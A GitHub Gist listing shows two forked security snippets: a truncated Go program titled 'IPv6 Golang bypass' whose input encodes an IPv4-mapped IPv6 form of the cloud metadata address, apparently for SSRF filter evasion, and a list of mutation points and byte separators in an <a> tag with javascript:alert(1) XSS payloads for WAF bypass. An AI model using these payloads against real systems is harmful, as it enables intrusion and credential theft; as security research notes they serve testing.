Skip to content

Instantly share code, notes, and snippets.

@tgr420
tgr420 / main.go
Created June 1, 2025 12:11 — forked from Sytten/main.go
IPv6 Golang bypass
package main
import (
"log"
"net"
"net/url"
)
func main() {
input := "http%3A%2F%2F::ffff:a9fe:a9fe:0443"
@tgr420
tgr420 / mutation_a.txt
Created April 11, 2025 04:15 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]